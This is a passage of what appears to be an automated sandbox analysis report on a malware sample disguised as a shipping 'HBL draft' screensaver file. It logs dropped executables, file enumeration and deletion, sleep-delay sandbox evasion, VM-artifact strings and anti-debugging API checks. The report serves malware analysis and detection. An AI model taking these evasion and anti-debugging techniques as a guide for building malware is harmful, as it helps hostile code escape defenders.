Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794F7A7 Sleep,ExitProcess, 0_2_2794F7A7
Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\xkn.exe Memory allocated: 1F43A9C0000 memory reserve | memory write watch
Source: C:\Users\Public\xkn.exe Memory allocated: 1F43AA10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 36_2_0040DD85
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_2795A748
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Window / User API: threadDelayed 9744
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1646
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1786
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe API coverage: 8.3 %
Source: C:\Windows \System32\per.exe API coverage: 7.1 %
Source: C:\Users\Public\alpha.exe API coverage: 7.9 %
Source: C:\Users\Public\alpha.exe API coverage: 9.5 %
Source: C:\Users\Public\alpha.exe API coverage: 8.8 %
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe API coverage: 10.0 %
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900 Thread sleep time: -714000s >= -30000s
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900 Thread sleep time: -29232000s >= -30000s
Source: C:\Users\Public\Libraries\glrkszlG.pif TID: 7348 Thread sleep count: 241 > 30
Source: C:\Users\Public\xkn.exe TID: 7712 Thread sleep count: 1646 > 30
Source: C:\Users\Public\xkn.exe TID: 7712 Thread sleep count: 1786 > 30
Source: C:\Users\Public\xkn.exe TID: 7736 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27959AF5 FindFirstFileW, 0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose, 0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794783C FindFirstFileW,FindNextFileW, 0_2_2794783C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 5_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 32_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 34_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW, 36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 37_2_00407EF8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00418981 memset,GetSystemInfo, 36_2_00418981
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWv-0006.spov-msedge.netLMEM@
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv5415.tmp.36.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Glzskrlg.PIF, 00000027.00000002.1856524613.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Glzskrlg.PIF, 0000002A.00000002.1933047287.0000000000776000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bhv5415.tmp.36.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\xkn.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BD920 CheckRemoteDebuggerPresent, 0_2_028BD920
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process queried: DebugFlags
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process queried: DebugFlags
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_401060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_401060E2
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A3A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle, 16_2_00007FF7E0A3A29C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 36_2_0040DD85
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_279567B9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40104AB4 mov eax, dword ptr fs:[00000030h] 0_2_40104AB4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279832B5 mov eax, dword ptr fs:[00000030h] 0_2_279832B5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_4010724E GetProcessHeap, 0_2_4010724E
Source: C:\Users\Public\xkn.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40102639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_40102639
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40102B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_40102B1C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27974FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_27974FDC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2797BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2797BB22
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27974B47 SetUnhandledExceptionFilter, 0_2_27974B47
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_279749F9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279749F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_279749F8
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 1_2_004098D0
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004098F0 SetUnhandledExceptionFilter, 1_2_004098F0
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 5_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 6_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 9_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00007FF70CC88FA4
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A3ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF7E0A3ED50
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A3F050 SetUnhandledExceptionFilter, 16_2_00007FF7E0A3F050
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF98CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00007FF6FEF98CCC
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF989F0 SetUnhandledExceptionFilter, 17_2_00007FF6FEF989F0
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 31_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 32_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 32_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC893B0 SetUnhandledExceptionFilter, 34_2_00007FF70CC893B0
